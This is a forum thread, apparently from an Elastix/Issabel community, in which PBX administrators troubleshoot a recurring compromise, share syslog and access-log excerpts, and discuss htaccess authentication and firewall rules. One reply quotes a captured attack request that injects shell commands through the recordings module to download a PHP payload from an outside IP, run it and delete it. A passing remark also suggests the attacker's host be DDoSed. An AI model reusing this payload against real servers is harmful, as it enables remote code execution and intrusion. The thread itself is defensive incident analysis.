Jun 10 03:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
Jun 10 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
Jun 10 04:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 04:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 05:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 06:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 11:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 11:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk
I delete them over and over but they come back...
I see strange POST commands on the access and ssl_access logs which I have already shared with you..
Now try to find a script wriyting to those directories
hello, sorry for me english,
Hello, I usually put on all servers protected by htaccess to at least thus prevent anyone accessing the web part. I copy what they have to do to ask user and password when accessing issabel (or old elastix), I put it in Spanish because I do not know English well, but I hope you understand.
Asus clients give them the username and password and with that they can only access via the web those who know
I hope it helps
hola, yo suelo poner en todos los servidores protegidos por htaccess para al menos asi evitar que acceda cualquiera a la parte web. les copio lo que deben hacer para que pida usuario y clave al acceder a issabel ( o antiguo elastix), lo pongo en español porque en ingles no se bien, pero espero se entienda.
Asus clientes les dan el usuario y la clave y con eso solo podran acceder via web quienes lo conozcan
Espero que les ayude
en el fichero de configuracion en
vi /etc/httpd/conf.d/elastix.conf
en el fichero elastix.conf
hay que poner algo asi
Timeout 300
#MaxClients 150
#MaxRequestsPerChild 1000
User asterisk
Group asterisk
#esto es para preguntar por usuario y clave al entrar por web para mas seguridad
<Directory "/var/www/html">
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}
AuthType Basic
AuthName "Zona Restringida voip"
AuthUserFile /usr/local/apache/wwwpasswd
Require user clientes
</Directory>
luego e guarda y se ejecuta
para crear el directorio y usuarios del password solitiado por ejemplo para clientes que es el usuario seria
El siguiente paso es generar el password con el comando
mkdir /usr/local/apache
htpasswd -c /usr/local/apache/wwwpasswd clientes
Luego solicitara ingresar un password, finalizados estos pasos es necesario reiniciar apache para que tome los cambios
service httpd restart
y listo con esto pedira usuario y clave en el puerto 443
Hello hgmnetwork,
Thanks for the workaround.
It is useful for this problem to remove ARI ?
Para borrarlo si esta infectado no pero no deberia pasar mas una vez limpiado ya que bloquea el acceso http a peticiones sin clave
If your server are exploit not. If you are delete all files affected and put htaccess not exploit more with http access
Sorry for me english
hgmnetwork Gracias por tu consejo, hice lo que recomendaste pero igual pasó lo mismo con tu sugerencia. Parece que es algún script que ya está dentro del sistema que está haciendo esto pero no puedo determinar dónde está aún.
English version: Thank you for your advice, i did what you suggested but the same happened nonetheless. It looks there it is a script that is already on the server that is running and doing this but I can't determine where it is yet.
Paul
striderec De acuerdo a tus logs el modulo de recordings es el que esta comprometido. A través de ese modulo están descargando los scripts que puedes ver en la URL:
POST%20%2Frecordings%2Fmisc%2F%3Fcmd%3Did%3Buname%20-a%3Bcurl%20-ks%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20%3E%20%2Ftmp%2Fa.out%20%7C%7C%20wget%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20-O%20%2Ftmp%2Fa.out%20%7C%7C%20GET%20%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20%3E%20%2Ftmp%2Fa.out%3Bphp%20%2Ftmp%2Fa.out%3Brm%20%2Ftmp%2Fa.outSe traduce en:
POST /recordings/misc/?cmd=id;uname -a;curl -ks http://51.15.12.13/t/cmd.txt > /tmp/a.out || wget http://51.15.12.13/t/cmd.txt -O /tmp/a.out || GET http://51.15.12.13/t/cmd.txt > /tmp/a.out;php /tmp/a.out;rm /tmp/a.outEmpieza por bannear todo trafico a la IP 51.15.12.13, el archivo txt codificado lo puedes ver incluso en el browser.
Verifica que haya una actualización del modulo de recording o simplemente deshabilitalo.
El server esta hosteado en Francia y tiene reportes de abuso contra PBX:
https://www.abuseipdb.com/check/51.15.12.13
Y aqui hay información de contacto:
https://hostingcompass.com/whois/51.15.12.13
Por si gustas hacer spam o ddos
Lo raro si ya tienes bloqueado con htaccess el acceso es que pueda volver a hacerlo mediante get o post por web, imagino que tendrias algun script o fichero metido todavia. En teoria una vez elimines todo lo infectado con el htaccess no te debe volver a pasar al menos si el ataque es por web ( por ejemplo intentan hacer un get o post a cualquier pagina no podran si no tienen usuario y clave del htaccess.
En cuanto elimines todo lo problemático dentro del servidor no se te deberia volver a infectar.
Otra solucion para buscar posibles ficheros sospechosos es buscar cualquier fichero cuayo ultimo acceso fuera por ejemplo hoy o ayer o el dia x que sepas que te han entrado igual te salen muchos pero te limitara la busqueda
navaismo Gracias! Eso mismo estoy haciendo ahora aunque es esa IP en cuestión y otras más.. En realidad acabo de darme cuenta que ponerle password al http como sugirió hgmnetwork si está funcionando, lo que pasa es que me olvidé de un paso en uno de los servidores afectados ya que este es el ssl_access log de un servidor al que trrataron de entrar pero no pudieron:
89.249.67.50 - - [13/Jun/2017:05:31:39 -0400] "GET / HTTP/1.1" 401 381
213.202.233.77 - - [13/Jun/2017:05:31:39 -0400] "GET /recordings/misc/salem.php HTTP/1.1" 403 227
89.249.67.50 - - [13/Jun/2017:05:44:35 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:05:58:07 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:06:11:47 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:06:23:10 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:06:34:36 -0400] "GET / HTTP/1.1" 401 381
163.172.68.183 - - [13/Jun/2017:06:34:41 -0400] "GET /a2billing/customer/templates/default/footer.tpl HTTP/1.1" 401 381
216.218.206.68 - - [13/Jun/2017:06:45:01 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:06:45:38 -0400] "GET / HTTP/1.1" 401 381
216.218.206.68 - - [13/Jun/2017:06:45:46 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:06:56:28 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:07:08:26 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:07:19:34 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:07:31:06 -0400] "GET / HTTP/1.1" 401 381
89.249.67.50 - - [13/Jun/2017:07:55:53 -0400] "GET / HTTP/1.1" 401 381
Como ves error los intrusos obtienen el error 401 que es UNAUTHORIZED y 403 (FORBIDDEN) no pueden hacer nada. Es una molestia tener que ingresar doble clave (La del servidor Apache y la propia de Elastix / issabel) pero algo que los clientes sabrán entender cuando se les dice que es para evitar intrusos en el sistema.
Adicionalmente todo parece indicar que es a través de los scripts de recordings por donde están vulnerando a Elastix como indicaste.
striderec En realidad no deberias tener abierto los puertos hacia la WAN. Desde ahà comienza el problema, Tu diseño debe seguir estas preguntas:
-- ¿Realmente necesitas abrir puertos?
-- Si tienes que abrir puertos, solo se hace a IP conocidas.
-- Si las IPs son dinamicas una VPN soluciona el problema.
Es regla básica jamás abrir puertos a la WAN sin un filtro o sin VPN precisamente por lo que te ha pasado. Lo mejor es reinstalar el PBX ya que no has podido identificar si hay script en el server.
navaismo Generalmente sólo abro el PBX a las IPs mÃas (oficina, casa, IPs fijas del cliente si las tuviera), tengo el módulo anti hacker y el firewall activo para evitar esto pero como sabemos todos los hackers siempre se las ingenian para ver cómo entran.
La VPN es buena idea pero desafortunadamente sirve sólo para instalaciones "en el sitio" (locales) las cuales en el caso particular de mi negocio casi no tengo ya que a la mayorÃa de mis clientes les gusta la idea de tener algo hosted fuera de su oficina o en la nube y el 95% de mi clientela tiene Elastix virtualizados con VMWare ESXi 6.5 desde mi centro de datos por lo cual la VPN no es solución adecuada debido a una razón simple: Todos mis clientes son extensiones remotas y salvo honrosas excepciones no todos los teléfonos IP tienen cliente VPN incorporado en su firmware para poder conectarlos de esa forma a la red de mi centro de datos..
striderec Fijate que por los logs te están haciendo un básico ataque de diccionario para ingresar (todos los POST a / ). Poniendo .htaccess se les hará más complicado (quizas los script kiddies no usan basic http auth y solo automatizan los posts)... o bien tendrán dos claves que adivinar.
ARI es un conocido vector de ataque, no estoy seguro de que en la version incluÃda en Issabel 4 existan las vulnerabilidades en callme.php y similares que parecen haber sido los vectores de ataque en tu caso... es posible que eso esté resuelto, pero no puedo garantizarlo.
ARI es uno de los primeros candidatos a ser removido, luego de a2billing que ya fue removido del ISO. A menos que existan usuarios que puedan aportar los parches de seguridad adecuados, lo que posiblemente decidamos sea retirar la funcionalidad (desarrollada por terceros), o forzar capas de autenticación .htaccess. Pero lo ideal a mediano plazo serÃa reemplazarlo por herramientas propias y más modernas, al igual que FreePBX.
SerÃa bueno armar un equipo de "seguridad" que pueda hacer pruebas y pen testing , o que pueda intentar usar todos los exploits conocidos sobre una instalación fresca.
Saludos,
asternic Nicolás, apliqué lo indicado por hgmnetwork y por lo menos hasta ahora los potenciales atacantes están recibiendo los errores HTTP 401 y 403 lo cual es positivo hasta el momento. Igual estaré monitoreando mis servidores afectados durante todo el dÃa para saber si asà se ven finalmente truncados en sus intentos de ingresar y dañar el acceso GUI de FreePBX.
Lo que me preocupa es que http y https están bloqueados en el firewall para IPs que no sean la mÃa y las fijas de los clientes pero aún sigo viendo intentos de accesar a la central por esos puertos lo cual me deja pensando si algo del firewall de Elastix no está funcionando bien o si no está aplicando las reglas en el orden correcto.
Yo entiendo que la prioridad es de número mayor a número menor lo cual significa por ejemplo que la regla #12 se aplica primero que la regla #8 y por ende lo que la regla #8 "libere" viene después de lo que yo haya "bloqueado" en la regla #12. Ejemplo: En la regla #12 de acuerdo al firewall de Elastix he bloqueado http a todo el mundo y en la regla #8 desbloqueo http para 127.0.0.1 y en la #9 desbloqueo http para la IP fija de mi oficina. Si entiendo esta lógica correctamente esta acción deberÃa permitir el paso al puerto http a las IPs de la regla #8 y #9 pero a nadie más. CorrÃjanme si me equivoco?
A mi siempre me ha gustado aportar con reportes de bugs del sistema o con problemas de cualquier Ãndole. Ayuda mucho que yo comercializo elastix virtualizado junto con DIDs y minutos de llamadas locales o internacionales para oficinas y call centers. Estoy dÃa a dÃa monitoreando mis servdores para estar pendiente de cualquier ataque o problema que pueda haber y reportarlo.
asternic y por cierto, estos ataques fueron realizados también a instalaciones limpias, nuevecitas de paquete de Elastix 4.0 que se supone tiene CentOS 7 y no el 5.11 que ya está descontinuado. Es decir que el exploit del script está presente incluso en la versión "mas reciente" del antiguo Elastix.
striderec Todo lo que puedas reportar es más que bienvenido. Con respecto a las reglas de firewall, lo único que puedo sugerir es que las veas en consola, no por web:
iptables -vnL
Y ahà podrás verificar el orden de las mismas. Elastix 4 tiene muchos bugs debido a la intriducción de Centos 7, incluÃdo el que NO INICIALIZA el firewall aunque en el GUI diga que si. Y el GUI no comprueba nunca si el firewall (iptables), está corriendo o no.
El comando de arriba te va a mostrar si hay reglas o no creadas.
Issabel 4 ha cambiado mucho de lo que fue Elastix 4:
FreePBX fue forkeado a IssabelPBX en su version 2.11.43 (esa versión corrige muchos de los exploits de freePBX).
Hemos corregido el bug anteriormente mencionado con el firewall y además muestra en GUI el estado real.
Hemos comprobado que hay exploits no reportados/conocidos en A2Billing, por lo que lo hemos removido del .iso y próximamente de los repositorios de modo preventivo.
Es posible que existan otros exploits in freePBX (IssabelPBX ahora), o en el código que era de Elastix, y estamos trabajando proactivamente para resolver/minimizar incidencias.
En la próxima semana anunciaremos la versión estable de Issabel 4, y te pediremos entonces que puedas al menos migrar uno de tus sistemas (si tienes tiempo y ganas, puedes hacerlo con nuestra versión de desarrollo esta misma semana), para luego monitorear este nuevo sistema y veas si es atacado y exploiteado.
Si quieres experimentar con la iso de Issabel 4, dime por privado y te hago llegar un link para que lo pruebes.
Saludos,
Estuve sufriendo el mismo ataque, todos los dÃas a las 00:22 se elminaban varios archivos, lo mitigue con un script que recupera desde un backup anterior los archivos afectados. También bloqueé todo el tráfico https que por error habÃa quedado expuesto a la pública y eliminé el file magnito.php que sólo se encontraba en el directorio _asterisk, curiosamente con fecha de Octubre de 2015 que es la de instalación de la central. Por ahora desde hace una semana que no tengo inconvenientes y por si acaso también eliminé el directorio /usr/src/a2billing.
